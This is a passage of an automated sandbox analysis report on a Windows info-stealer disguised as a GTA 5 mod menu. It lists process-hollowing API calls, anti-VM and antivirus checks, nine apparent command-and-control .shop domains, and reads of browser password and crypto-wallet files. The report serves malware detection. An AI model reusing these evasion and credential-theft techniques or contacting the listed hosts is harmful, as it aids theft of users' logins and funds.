                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004357B34_2_004357B3
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: String function: 00407FC0 appears 40 times
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: String function: 00414270 appears 58 times
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: String function: 00F966CD appears 34 times
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: String function: 00F91CE8 appears 42 times
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: String function: 00F89BB0 appears 94 times
                Source: GTA-5-Mod-Menu-2025.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: GTA-5-Mod-Menu-2025.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003287760416666
                Source: GTA-5-Mod-Menu-2025.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003287760416666
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/0@1/1
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00437C80 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,4_2_00437C80
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
                Source: GTA-5-Mod-Menu-2025.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2123469100.0000000005CBC000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2123243115.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136873059.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: GTA-5-Mod-Menu-2025.exeReversingLabs: Detection: 31%
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile read: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeProcess created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeProcess created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeProcess created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeProcess created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: GTA-5-Mod-Menu-2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: GTA-5-Mod-Menu-2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: GTA-5-Mod-Menu-2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: GTA-5-Mod-Menu-2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: GTA-5-Mod-Menu-2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F89D6A push ecx; ret 0_2_00F89D7D
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F89D6A push ecx; ret 3_2_00F89D7D
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004454B0 push edx; retf 4_2_004454B1
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00444667 push es; ret 4_2_0044466C
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043E740 push eax; mov dword ptr [esp], C5C4CBFAh4_2_0043E741
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00444760 push ecx; iretd 4_2_004447D9
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeWindow / User API: threadDelayed 6913Jump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe TID: 1976Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe TID: 340Thread sleep count: 6913 > 30Jump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F9B6A8 FindFirstFileExW,0_2_00F9B6A8
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F9B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00F9B759
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F9B6A8 FindFirstFileExW,3_2_00F9B6A8
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F9B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00F9B759
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830538031.0000000003536000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830464050.000000000352C000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2108369329.0000000003534000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338011938.0000000003537000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3337910080.00000000034FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeAPI call chain: ExitProcess graph end nodegraph_4-14492
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043CF30 LdrInitializeThunk,4_2_0043CF30
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F89A33 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F89A33
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00FB019E mov edi, dword ptr fs:[00000030h]0_2_00FB019E
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F81BA0 mov edi, dword ptr fs:[00000030h]0_2_00F81BA0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F81BA0 mov edi, dword ptr fs:[00000030h]3_2_00F81BA0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F96FE0 GetProcessHeap,0_2_00F96FE0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F89A33 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F89A33
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F91A20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F91A20
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F89A27 SetUnhandledExceptionFilter,0_2_00F89A27
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F89673 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F89673
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F89A33 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F89A33
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F91A20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F91A20
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F89A27 SetUnhandledExceptionFilter,3_2_00F89A27
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F89673 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00F89673

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00FB019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00FB019E
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeMemory written: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fancywaxxers.shop
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeProcess created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeProcess created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetLocaleInfoW,0_2_00F9B0D0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: EnumSystemLocalesW,0_2_00F968BD
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: EnumSystemLocalesW,0_2_00F9B085
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00F9A9F7
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00F9B177
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetLocaleInfoW,0_2_00F9B27D
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetLocaleInfoW,0_2_00F963B5
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00F9ACF0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: EnumSystemLocalesW,0_2_00F9AC48
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetLocaleInfoW,0_2_00F9AFB0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: EnumSystemLocalesW,0_2_00F9AF43
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetLocaleInfoW,3_2_00F9B0D0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: EnumSystemLocalesW,3_2_00F968BD
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: EnumSystemLocalesW,3_2_00F9B085
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00F9A9F7
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00F9B177
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetLocaleInfoW,3_2_00F9B27D
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetLocaleInfoW,3_2_00F963B5
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00F9ACF0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: EnumSystemLocalesW,3_2_00F9AC48
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: GetLocaleInfoW,3_2_00F9AFB0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: EnumSystemLocalesW,3_2_00F9AF43
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F8A2F5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F8A2F5
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2196493094.0000000003593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338561708.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202624391.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830428069.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \MsMpeng.exe
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
